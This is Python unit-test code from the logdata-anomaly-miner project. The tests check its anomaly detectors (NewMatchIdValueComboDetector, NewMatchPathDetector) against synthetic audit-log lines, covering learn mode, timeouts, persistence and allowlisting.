            FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '),
            FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]),
        SequenceModelElement('syscall', [
            FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('),
            DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'),
            FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '),
            FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'),
            FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']),
            FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'),
            # Everything after exit= is not modelled further.
            AnyByteDataModelElement('remainding_data')])])

    def test1receive_match_in_time_with_learn_mode(self):
        """
        This test case checks if log_atoms are accepted as expected with the learn_mode=True.

        All atoms are timestamped with time.time() at creation, so they fall well inside min_allowed_time_diff
        (0.1 s) of each other; the expected tables below describe the detector state after each of the 21 lines.
        """
        description = 'test1newMatchIdValueComboDetectorTest'
        # One entry per log line: True means the detector wrote nothing to the output stream for that atom.
        output_stream_empty_results = [
            True, False, True, False, True, False, True, True, True, True, True, True, True, True, False, False, False, True, False,
            True, False]
        # Expected id_dict_current after each atom: audit id -> {value path: value} for ids still waiting for
        # their partner record (id 100 never gets a PATH record in log_lines and therefore stays).
        id_dict_current_results = [
            {1: {'parser/type/syscall/syscall': 1}}, {}, {2: {'parser/type/syscall/syscall': 2}}, {},
            {3: {'parser/type/syscall/syscall': 3}}, {}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 4: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 5: {'parser/type/path/name': 'two'}}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}},
            {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}},
            {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'},
             8: {'parser/type/syscall/syscall': 6}},
            {100: {'parser/type/syscall/syscall': 1}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}},
            {100: {'parser/type/syscall/syscall': 1}, 8: {'parser/type/syscall/syscall': 6}}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 9: {'parser/type/syscall/syscall': 2}}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 10: {'parser/type/path/name': 'one'}}, {100: {'parser/type/syscall/syscall': 1}}]
        # Nothing ages out within 0.1 s, so the old dict is expected to stay empty for every atom.
        id_dict_old_results = [{}] * 21
        min_allowed_time_diff = 0.1
        log_atoms = []
        for line in self.log_lines:
            t = time.time()
            log_atoms.append(
                LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__))
        new_match_id_value_combo_detector = NewMatchIdValueComboDetector(
            self.aminer_config, ['parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler],
            id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff,
            learn_mode=True, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False)
        self.analysis_context.register_component(new_match_id_value_combo_detector, description)
        for i, log_atom in enumerate(log_atoms):
            self.assertTrue(new_match_id_value_combo_detector.receive_atom(log_atom))
            self.assertEqual(self.output_stream.getvalue() == "", output_stream_empty_results[i], log_atom.raw_data)
            self.assertEqual(new_match_id_value_combo_detector.id_dict_current, id_dict_current_results[i])
            self.assertEqual(new_match_id_value_combo_detector.id_dict_old, id_dict_old_results[i])
            # The stream is cleared per atom so each emptiness check covers exactly one line.
            self.reset_output_stream()

    def test2receive_match_after_max_allowed_time_diff_with_learn_mode(self):
        """
        This test case checks if log_atoms are deleted after the maximal allowed time difference with the learn_mode=True.

        Atoms are spaced 0.25 * min_allowed_time_diff apart, so entries are expected to move from id_dict_current to
        id_dict_old (and eventually disappear) as the 5 s window passes.
        """
        description = 'test2newMatchIdValueComboDetectorTest'
        # One entry per log line: True means the detector wrote nothing to the output stream for that atom.
        output_stream_empty_results = [
            True, False, True, False, True, False, True, True, True, True, True, True, True, True, False, False, False, True, False,
            True, False]
        # Expected id_dict_current after each atom; unlike test1, id 100 drops out once it has aged past the window.
        id_dict_current_results = [
            {1: {'parser/type/syscall/syscall': 1}}, {}, {2: {'parser/type/syscall/syscall': 2}}, {},
            {3: {'parser/type/syscall/syscall': 3}}, {}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 4: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}},
            {5: {'parser/type/path/name': 'two'}, 100: {'parser/type/syscall/syscall': 1}}, {}, {6: {'parser/type/syscall/syscall': 4}},
            {6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}},
            {6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}},
            {7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {}, {}, {9: {'parser/type/syscall/syscall': 2}},
            {}, {10: {'parser/type/path/name': 'one'}}, {}]
        # Expected id_dict_old after each atom: ids 100 and 8 are presumably parked here between aging out of
        # id_dict_current and being discarded.
        id_dict_old_results = [{}] * 10 + [{100: {'parser/type/syscall/syscall': 1}}] * 5 + [{8: {'parser/type/syscall/syscall': 6}}] + [
            {}] * 5
        min_allowed_time_diff = 5
        log_atoms = []
        t = time.time()
        for line in self.log_lines:
            log_atoms.append(
                LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__))
            # Synthetic spacing of 1.25 s between consecutive atoms.
            t = t + min_allowed_time_diff * 0.25
        new_match_id_value_combo_detector = NewMatchIdValueComboDetector(
            self.aminer_config, ['parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler],
            id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff,
            learn_mode=True, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False)
        self.analysis_context.register_component(new_match_id_value_combo_detector, description)
        for i, log_atom in enumerate(log_atoms):
            self.assertTrue(new_match_id_value_combo_detector.receive_atom(log_atom))
            self.assertEqual(self.output_stream.getvalue() == "", output_stream_empty_results[i], log_atom.raw_data)
            self.assertEqual(new_match_id_value_combo_detector.id_dict_current, id_dict_current_results[i], log_atom.raw_data)
            self.assertEqual(new_match_id_value_combo_detector.id_dict_old, id_dict_old_results[i])
            self.reset_output_stream()

    def test3receive_match_in_time_without_learn_mode(self):
        """
        This test case checks if log_atoms are accepted as expected with the learn_mode=False.

        Same atoms and timing as test1, but with learn_mode=False every completed combination is reported instead
        of being learned, so known_values must stay empty and more atoms produce output.
        """
        description = 'test3newMatchIdValueComboDetectorTest'
        # One entry per log line: True means the detector wrote nothing to the output stream for that atom.
        output_stream_empty_results = [
            True, False, True, False, True, False, True, True, False, True, False, True, True, True, False, False, False, True, False,
            True, False]
        # Expected id_dict_current after each atom (identical to test1: the id bookkeeping does not depend on learn_mode).
        id_dict_current_results = [
            {1: {'parser/type/syscall/syscall': 1}}, {}, {2: {'parser/type/syscall/syscall': 2}}, {},
            {3: {'parser/type/syscall/syscall': 3}}, {}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 4: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 5: {'parser/type/path/name': 'two'}}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}},
            {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}},
            {100: {'parser/type/syscall/syscall': 1}, 6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'},
             8: {'parser/type/syscall/syscall': 6}},
            {100: {'parser/type/syscall/syscall': 1}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}},
            {100: {'parser/type/syscall/syscall': 1}, 8: {'parser/type/syscall/syscall': 6}}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 9: {'parser/type/syscall/syscall': 2}}, {100: {'parser/type/syscall/syscall': 1}},
            {100: {'parser/type/syscall/syscall': 1}, 10: {'parser/type/path/name': 'one'}}, {100: {'parser/type/syscall/syscall': 1}}]
        id_dict_old_results = [{}] * 21
        min_allowed_time_diff = 0.1
        log_atoms = []
        for line in self.log_lines:
            t = time.time()
            log_atoms.append(
                LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__))
        new_match_id_value_combo_detector = NewMatchIdValueComboDetector(
            self.aminer_config, ['parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler],
            id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff,
            learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False)
        self.analysis_context.register_component(new_match_id_value_combo_detector, description)
        for i, log_atom in enumerate(log_atoms):
            self.assertTrue(new_match_id_value_combo_detector.receive_atom(log_atom))
            self.assertEqual(self.output_stream.getvalue() == "",
output_stream_empty_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_current, id_dict_current_results[i]) self.assertEqual(new_match_id_value_combo_detector.id_dict_old, id_dict_old_results[i]) self.assertEqual(new_match_id_value_combo_detector.known_values, []) self.reset_output_stream() def test4receive_match_after_max_allowed_time_diff_without_learn_mode(self): """This test case checks if log_atoms are deleted after the maximal allowed time difference with the learn_mode=False.""" description = 'test4newMatchIdValueComboDetectorTest' output_stream_empty_results = [True, False, True, False, True, False, True, True, False, True, False, True, True, True, False, False, False, True, False, True, False] id_dict_current_results = [ {1: {'parser/type/syscall/syscall': 1}}, {}, {2: {'parser/type/syscall/syscall': 2}}, {}, {3: {'parser/type/syscall/syscall': 3}}, {}, {100: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}, 4: {'parser/type/syscall/syscall': 1}}, {100: {'parser/type/syscall/syscall': 1}}, {5: {'parser/type/path/name': 'two'}, 100: {'parser/type/syscall/syscall': 1}}, {}, {6: {'parser/type/syscall/syscall': 4}}, {6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}}, {6: {'parser/type/syscall/syscall': 4}, 7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {7: {'parser/type/path/name': 'five'}, 8: {'parser/type/syscall/syscall': 6}}, {}, {}, {9: {'parser/type/syscall/syscall': 2}}, {}, {10: {'parser/type/path/name': 'one'}}, {}] id_dict_old_results = [{}] * 10 + [{100: {'parser/type/syscall/syscall': 1}}] * 5 + [{8: {'parser/type/syscall/syscall': 6}}] + [ {}] * 5 min_allowed_time_diff = 5 log_atoms = [] t = time.time() for line in self.log_lines: log_atoms.append( LogAtom(line, ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line))), t, self.__class__.__name__)) t = t + min_allowed_time_diff * 0.25 
new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) for i, log_atom in enumerate(log_atoms): self.assertTrue(new_match_id_value_combo_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue() == "", output_stream_empty_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_current, id_dict_current_results[i], log_atom.raw_data) self.assertEqual(new_match_id_value_combo_detector.id_dict_old, id_dict_old_results[i]) self.assertEqual(new_match_id_value_combo_detector.known_values, []) self.reset_output_stream() def test5allowlist_unknown_target_path(self): """This test case checks if an unknown target path can be added to the known_values with the allowlist_event method.""" description = 'test5newMatchIdValueComboDetectorTest' min_allowed_time_diff = 5 new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) self.assertEqual(new_match_id_value_combo_detector.known_values, []) event_data = {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'} output = new_match_id_value_combo_detector.allowlist_event( 'Analysis.%s' % 
new_match_id_value_combo_detector.__class__.__name__, event_data, None) self.assertEqual(new_match_id_value_combo_detector.known_values, [ {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'}]) self.assertEqual(output, self.expected_allowlist_string % event_data) event_data = {'parser/type/syscall/syscall': 2, 'parser/type/path/name': 'two'} output = new_match_id_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_id_value_combo_detector.__class__.__name__, event_data, None) self.assertEqual(new_match_id_value_combo_detector.known_values, [ {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'}, {'parser/type/syscall/syscall': 2, 'parser/type/path/name': 'two'}]) self.assertEqual(output, self.expected_allowlist_string % event_data) def test6allowlist_known_target_path(self): """This test case checks if a known target path is not added twice to the known_values with the allowlist_event method.""" description = 'test6newMatchIdValueComboDetectorTest' min_allowed_time_diff = 5 new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) self.analysis_context.register_component(new_match_id_value_combo_detector, description) self.assertEqual(new_match_id_value_combo_detector.known_values, []) event_data = {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'} output = new_match_id_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_id_value_combo_detector.__class__.__name__, event_data, None) self.assertEqual(new_match_id_value_combo_detector.known_values, [{'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'}]) self.assertEqual(output, self.expected_allowlist_string 
% event_data) event_data = {'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'} output = new_match_id_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_id_value_combo_detector.__class__.__name__, event_data, None) self.assertEqual(new_match_id_value_combo_detector.known_values, [{'parser/type/syscall/syscall': 1, 'parser/type/path/name': 'one'}]) self.assertEqual(output, self.expected_allowlist_string % event_data) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/NewMatchPathDetectorTest.py000066400000000000000000000403531437606560100310430ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.input.LogAtom import LogAtom import time from datetime import datetime from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class NewMatchPathDetectorTest(TestBase): """Unittests for the NewMatchPathDetector.""" __expected_string = '%s New path(es) detected\n%s: "%s" (%d lines)\n %s\n%s\n\n' match_path_s1 = "['/s1']" match_path_d1 = "['/d1']" datetime_format_string = '%Y-%m-%d %H:%M:%S' analysis = 'Analysis.%s' pid = " pid=" uid = " uid=2" match_context_fixed_dme = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(b'25537 uid=2') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element("", 
match_context_decimal_integer_value_me)

    def test1_log_atom_not_known(self):
        """
        This test case checks the correct processing of unknown log lines, which in reality means that an anomaly has been found.
        The output is directed to an output stream and compared for accuracy. The learn_mode is False and the output must be
        repeatable on second run.
        """
        description = "Test1NewMatchPathDetector"
        # Fourth positional argument is learn_mode (False here), so nothing is learned between the two identical atoms below.
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False,
                                                       output_logline=False)
        self.analysis_context.register_component(new_match_path_detector, description)
        # Rounded so the timestamp rendered in the expected output matches exactly.
        t = round(time.time(), 3)
        log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector)
        log_atom_decimal_integer_value_me = LogAtom(self.match_context_decimal_integer_value_me.match_data,
                                                    ParserMatch(self.match_element_decimal_integer_value_me), t, new_match_path_detector)
        self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1,
            self.match_path_s1, self.pid))
        self.reset_output_stream()

        # repeating should produce the same result
        self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1,
            self.match_path_s1, self.pid))
        self.reset_output_stream()

        # other MatchElement
        self.assertTrue(new_match_path_detector.receive_atom(log_atom_decimal_integer_value_me))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1,
            self.match_path_d1, self.uid))

    def test2_log_atom_known(self):
        """
        This test case checks the functionality of the learn_mode.
        If the same MatchElement is processed a second time and the learn_mode was True, no event must be triggered.
        """
        description = "Test2NewMatchPathDetector"
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
                                                       output_logline=False)
        self.analysis_context.register_component(new_match_path_detector, description)
        t = round(time.time(), 3)
        log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector)
        log_atom_decimal_integer_value_me = LogAtom(self.match_context_decimal_integer_value_me.match_data,
                                                    ParserMatch(self.match_element_decimal_integer_value_me), t, new_match_path_detector)
        self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1,
            self.match_path_s1, self.pid))
        self.reset_output_stream()

        # repeating should NOT produce the same result
        self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme))
        self.assertEqual(self.output_stream.getvalue(), '')
        self.reset_output_stream()

        # other MatchElement
        self.assertTrue(new_match_path_detector.receive_atom(log_atom_decimal_integer_value_me))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1,
            self.match_path_d1, self.uid))

    def test3_log_atom_known_from_persisted_data(self):
        """The persisting and reading of permitted log lines should be checked with this test."""
        description = "Test3NewMatchPathDetector"
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
                                                       output_logline=False)
        self.analysis_context.register_component(new_match_path_detector, description)
        t = round(time.time(), 3)
        log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector)
        self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1,
            self.match_path_s1, self.pid))
        # Persist the learned path, then let a second detector (learn_mode False) pick it up from persistence.
        new_match_path_detector.do_persist()
        self.reset_output_stream()
        # NOTE(review): unlike the first detector this one is not registered with analysis_context; the sibling
        # NewMatchPathValueComboDetectorTest does register its second detector — confirm the omission is intentional.
        otherNewMatchPathDetector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False,
                                                         output_logline=False)
        otherLogAtomFixedDME = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, otherNewMatchPathDetector)
        self.assertTrue(otherNewMatchPathDetector.receive_atom(otherLogAtomFixedDME))
        # The path was loaded from persistence, so no anomaly is reported.
        self.assertEqual(self.output_stream.getvalue(), '')

    def test4_get_time_trigger_class(self):
        """
        The known paths are to be periodically stored after a certain time. This requires a synchronization class.
        The return of the correct class is to be checked in this test case.
        """
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
                                                       output_logline=False)
        self.assertEqual(new_match_path_detector.get_time_trigger_class(), 1)

    # skipcq: PYL-W0105
    """The following test cases should check if the doTimer() method is working properly.This includes the updating of nextPersistTime. As it is not updated directly in the method this test cases are not correct. Due to that they are commented."""

    # def test5_do_timer_next_persist_time_none(self):
    #     """During initialization, the next time is not determined (the value is initialized with None). In this case, the persistence is
    #     expected to occur after 600 milliseconds."""
    #     self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
    #                                                         output_logline=False)
    #     self.assertEqual(self.new_match_path_detector.do_timer(200), 600)
    #     self.assertEqual(self.new_match_path_detector.do_timer(400), 600)
    #     self.assertEqual(self.new_match_path_detector.do_timer(10000), 600)
    #
    # def test6_do_timer_delta_smaller_or_equal_zero(self):
    #     """If the NextPersistTime is less than or equal to zero, the data must be saved."""
    #     self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
    #                                                         output_logline=False)
    #     self.new_match_path_detector.nextPersistTime = 400
    #     self.assertEqual(self.new_match_path_detector.do_timer(400), 600)
    #     self.assertEqual(self.new_match_path_detector.do_timer(1000), 600)
    #
    # def test7_do_timer_delta_greater_zero(self):
    #     """If the delta does not fall below the limit value, only the delta value should be returned."""
    #     # this test fails due to the missing update of the nextPersistTime variable in the doTimer method
    #     self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
    #                                                         output_logline=False)
    #     self.new_match_path_detector.nextPersistTime = 400
    #     self.assertEqual(self.new_match_path_detector.do_timer(200), 200)
    #     self.assertEqual(self.new_match_path_detector.do_timer(200), 600)
    #     self.assertEqual(self.new_match_path_detector.do_timer(100), 500)

    def test8_allowlist_event_type_exception(self):
        """This test case checks whether an exception is thrown when entering an event of another class."""
        description = "Test8NewMatchPathDetector"
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
                                                       output_logline=False)
        self.analysis_context.register_component(new_match_path_detector, description)
        t = round(time.time(), 3)
        log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector)
        new_match_path_detector.receive_atom(log_atom_fixed_dme)
        # The event type of a different detector class must be rejected, so an event raised elsewhere cannot be used
        # to allowlist paths in this detector.
        new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, [], [self.stream_printer_event_handler],
                                                                             'Default', True, True)
        # NOTE(review): assertRaises(Exception, ...) accepts any exception type; pinning the specific type that
        # allowlist_event raises would make this check stronger.
        self.assertRaises(
            Exception, new_match_path_detector.allowlist_event, self.analysis % new_match_path_value_combo_detector.__class__.__name__,
            self.output_stream.getvalue(), None)

    def test9_allowlist_event_allowlisting_data_exception(self):
        """The NewMatchPathDetector can not handle allowlisting data and therefore an exception is expected."""
        description = "Test9NewMatchPathDetector"
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
                                                       output_logline=False)
        self.analysis_context.register_component(new_match_path_detector, description)
        t = round(time.time(), 3)
        log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector)
        new_match_path_detector.receive_atom(log_atom_fixed_dme)
        # Passing non-None allowlisting data (the third argument) must be refused.
        # NOTE(review): as in test8, the expected exception type is not pinned.
        self.assertRaises(Exception, new_match_path_detector.allowlist_event, self.analysis % new_match_path_detector.__class__.__name__,
                          self.output_stream.getvalue(), ['random', 'Data'])

    def test10_allowlist_event_with_known_and_unknown_paths(self):
        """This test case checks in which cases an event is triggered and compares with expected results."""
        description = "Test10NewMatchPathDetector"
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True,
                                                       output_logline=False)
        self.analysis_context.register_component(new_match_path_detector, description)
        t = round(time.time(), 3)
        log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector)
        new_match_path_detector.receive_atom(log_atom_fixed_dme)
        # Allowlisting a path that was already seen (learn_mode True).
        self.assertEqual(new_match_path_detector.allowlist_event(
            self.analysis % new_match_path_detector.__class__.__name__, self.match_element_fixed_dme.get_path(), None),
            'Allowlisted path(es) %s in %s.' % (
                self.match_element_fixed_dme.get_path(), self.analysis % new_match_path_detector.__class__.__name__))
        # Allowlisting a path that was never received, with learn_mode switched off.
        new_match_path_detector.learn_mode = False
        # NOTE(review): the first expectation above uses get_path() while this one reads the .path attribute —
        # presumably equivalent; verify against MatchElement before relying on it.
        self.assertEqual(new_match_path_detector.allowlist_event(
            self.analysis % new_match_path_detector.__class__.__name__, self.match_element_decimal_integer_value_me.get_path(), None),
            'Allowlisted path(es) %s in %s.' % (
                self.match_element_decimal_integer_value_me.path, self.analysis % new_match_path_detector.__class__.__name__))

    # '''
    # This test case checks what happens when no EventHandler is used in the parameters. Requires type check (not yet implemented).
    # '''
    # def test11_fuzzing_anomaly_event_handler(self):
    #     self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, None, 'Default', True, output_logline=False)
    #     t = datetime.fromtimestamp(time.time())
    #     self.log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data,
    #                                       ParserMatch(self.match_context_fixed_dme), t, self.new_match_path_detector)
    #     self.assertRaises(AttributeError, self.new_match_path_detector.receive_atom, self.log_atom_fixed_dme)
    #
    #     #At least one EventHandler should be used, else the Detector can not report anomalies
    #     self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, [], 'Default', True)
    #     self.log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data,
    #                                       ParserMatch(self.match_element_fixed_dme), t, self.new_match_path_detector)
    #     self.assertRaises(Exception, self.new_match_path_detector.receive_atom, self.log_atom_fixed_dme)
    #
    # '''
    # An attempt is made to use a non-Boolean expression for the autoIncludeFlag. Requires type check (not yet implemented).
# ''' # def test12_fuzzing_learn_mode(self): # self.assertRaises(ArgumentTypeError, NewMatchPathDetector, self.aminer_config, # [self.stream_printer_event_handler], 'Default', None) # self.assertRaises(ArgumentTypeError, NewMatchPathDetector, self.aminer_config, # [self.stream_printer_event_handler], 'Default', 'True') # # ''' # An exception is expected if no LogAtom is passed as a parameter. Requires type check (not yet implemented). # ''' # def test13_fuzzing_log_atom(self): # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, # [self.stream_printer_event_handler], 'Default', True) # self.assertRaises(ArgumentTypeError, self.new_match_path_detector.receive_atom, self.aminer_config) # # ''' # The data type must be checked before calculating the remaining time Requires type check (not yet implemented). # ''' # def test14_fuzzing_trigger_time(self): # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, # [self.stream_printer_event_handler], 'Default', True) # self.new_match_path_detector.nextPersistTime = 400 # self.assertRaises(ArgumentTypeError, self.new_match_path_detector.do_timer, '200') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/NewMatchPathValueComboDetectorTest.py000066400000000000000000000253021437606560100330150ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.input.LogAtom import LogAtom import time from unit.TestBase import TestBase from datetime import datetime class NewMatchPathValueComboDetectorTest(TestBase): """Unittests for the 
NewMatchPathValueComboDetector."""

    __expected_string = '%s New value combination(s) detected\n%s: "%s" (%d lines)\n%s\n\n'
    fixed_dme = FixedDataModelElement('s1', b'25537 uid=')
    fixed_dme2 = FixedDataModelElement('s2', b' uid=2')
    datetime_format_string = '%Y-%m-%d %H:%M:%S'
